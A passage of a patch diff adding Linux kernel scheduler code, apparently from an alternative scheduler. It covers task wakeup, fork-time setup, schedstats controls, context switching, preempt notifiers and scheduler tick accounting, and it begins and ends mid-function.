++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, thus the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be ran in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * Since the runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch have flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could rave with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing though
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible to use it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data. Preferring shallow idle state selection
++ * for a CPU that has IO-wait which might not even end up running the task when
++ * it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait account is to account the idle time that we could
++ * have spend running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've ran at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU, it can wake to another CPU than it
++ * blocked on. This means the per CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Return separately the current's pending runtime that have not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have a optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks have less than RESCHED_NS of time slice left they will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger slibing group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq= cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
